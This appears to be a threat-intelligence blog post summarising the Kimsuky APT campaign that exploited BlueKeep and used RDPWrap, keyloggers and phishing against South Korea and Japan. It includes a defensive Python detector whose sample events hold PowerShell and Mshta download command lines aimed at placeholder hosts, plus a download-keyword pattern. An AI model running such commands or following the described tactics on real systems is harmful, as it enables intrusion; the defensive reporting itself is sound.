
Kimsuky APT Exploits BlueKeep RDP Flaw in Cyber Attacks on South Korea and Japan


TL;DR

The North Korea-linked Kimsuky APT group has been exploiting the BlueKeep RDP vulnerability to gain initial access to systems in South Korea and Japan. This campaign, tracked as Larva-24005, involves the use of various malware and tactics to maintain remote access and exfiltrate data. The group has targeted multiple sectors, including software, energy, and finance, highlighting the ongoing cyber threat posed by North Korean actors.

Main Content

Researchers at the AhnLab Security Intelligence Center (ASEC) have uncovered a new campaign by the North Korea-linked Kimsuky APT group. This campaign, dubbed Larva-24005, exploits a patched Microsoft Remote Desktop Services (RDP) flaw to gain initial access to target systems.

Exploiting the BlueKeep Vulnerability

During their investigation, ASEC researchers discovered that the Kimsuky group exploited the BlueKeep vulnerability (CVE-2019-0708) to infiltrate target systems. Although an RDP vulnerability scanner was found on the compromised systems, there was no evidence of its actual use. The threat actors also employed other methods, such as attaching malicious files to emails and exploiting the Microsoft Office Equation Editor vulnerability (CVE-2017-11882) [1].

Maintaining Remote Access

Once the attackers gained access, they modified the system configuration by installing the MySpy malware and RDPWrap to maintain remote access. In the final stage of the attack, they deployed keyloggers like KimaLogger or RandomQuery to record keystrokes. The group was observed sending phishing emails targeting South Korea and Japan from the compromised systems.


Targeted Sectors and Countries

Since September 2023, the Kimsuky APT group has targeted organizations in South Korea, the U.S., China, Japan, Germany, Singapore, and other countries. Their activities include phishing campaigns and, starting in October 2023, attacks on South Korea’s software, energy, and financial sectors. ASEC researchers have also published indicators of compromise (IoCs) for this campaign.

Historical Context and Recent Activities

The Kimsuky cyberespionage group, also known as ARCHIPELAGO, Black Banshee, Thallium, Velvet Chollima, and APT43, was first identified by Kaspersky researchers in 2013. Operating under the Reconnaissance General Bureau (RGB) foreign intelligence service, the group primarily targets think tanks and organizations in South Korea, with additional victims in the United States, Europe, and Russia.

In February, ASEC researchers observed the Kimsuky APT group conducting spear-phishing attacks to deliver the forceCopy info-stealer malware. The state-sponsored hackers sent spear-phishing messages to distribute malicious *.LNK shortcut files disguised as Office documents. When opened, these files executed PowerShell or Mshta to download malware like PebbleDash and RDP Wrapper, enabling the attackers to control the infected systems.

The group also uses a custom-built RDP Wrapper to enable remote desktop access, likely modifying export functions to evade detection. Additionally, they install proxy malware to achieve external access to infected systems located in private networks.
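Two of the behaviours described above, a shortcut-launched PowerShell or Mshta downloader and RDP Wrapper-style persistence, lend themselves to host-based detection. The following Python is an added example, not code from ASEC or this post's author: it runs both checks over constructed Sysmon-style process-creation and registry events; the field names, the rdpwrap.dll install path and the fetch keywords are assumptions, and a custom RDP Wrapper build may not touch the ServiceDll value at all.

```python
import re

# Constructed Sysmon-style events (EID 1 = process creation, EID 13 = registry
# value set); not telemetry from the campaign. Paths and URLs are placeholders.
SAMPLE_EVENTS = [
    {"eid": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "iwr http://example.invalid/a.dat -OutFile $env:TEMP\\a.dat"'},
    {"eid": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/p.hta"},
    {"eid": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\u\Downloads\report.docx"'},
    {"eid": 13, "target": r"HKLM\System\CurrentControlSet\Services\TermService\Parameters\ServiceDll",
     "details": r"C:\Program Files\RDP Wrapper\rdpwrap.dll"},   # assumed install path
    {"eid": 13, "target": r"HKLM\System\CurrentControlSet\Services\TermService\Parameters\ServiceDll",
     "details": r"%SystemRoot%\System32\termsrv.dll"},          # the genuine value
]

LOLBINS = ("powershell.exe", "pwsh.exe", "mshta.exe")
FETCH_HINT = re.compile(r"https?://|\biwr\b|invoke-webrequest|downloadstring|downloadfile|\.hta\b", re.I)

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def flag_shortcut_launched_downloader(ev):
    """A double-clicked .LNK runs under explorer.exe, so explorer spawning
    PowerShell or Mshta with a remote-fetch command line matches the lure."""
    if ev.get("eid") != 1:
        return None
    if basename(ev["parent"]) == "explorer.exe" and basename(ev["image"]) in LOLBINS \
            and FETCH_HINT.search(ev["cmdline"]):
        return f"lolbin-from-explorer: {basename(ev['image'])} {ev['cmdline']}"
    return None

def flag_termservice_wrapper(ev):
    """The stock RDP Wrapper hooks Remote Desktop by pointing TermService's
    ServiceDll at its own DLL; anything other than termsrv.dll there is suspect."""
    if ev.get("eid") != 13:
        return None
    if not ev["target"].lower().endswith(r"\services\termservice\parameters\servicedll"):
        return None
    if ev["details"].lower().endswith(r"\system32\termsrv.dll"):
        return None
    return f"termservice-dll-redirect: ServiceDll -> {ev['details']}"

def scan(events):
    """Run both checks over an event list and return the alert strings."""
    checks = (flag_shortcut_launched_downloader, flag_termservice_wrapper)
    return [hit for ev in events for chk in checks if (hit := chk(ev))]
```

Running `scan(SAMPLE_EVENTS)` yields three alerts: the two explorer-spawned downloaders and the ServiceDll redirect, while the Word launch and the genuine termsrv.dll value pass silently.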

Keyloggers and Malware Deployment

The Kimsuky group employs keyloggers in various file formats, including PowerShell scripts. They also use the forceCopy stealer malware to capture keystrokes and extract files from browser directories.

Conclusion

The Kimsuky APT group’s exploitation of the BlueKeep RDP vulnerability underscores the ongoing cyber threat posed by North Korean actors. Their sophisticated tactics and tools highlight the need for robust cybersecurity measures to protect against such attacks. Organizations in targeted sectors should remain vigilant and implement comprehensive security strategies to mitigate these risks.


References

  1. ASEC (2025). “Report”. AhnLab Security Intelligence Center.

This post is licensed under CC BY 4.0 by the author.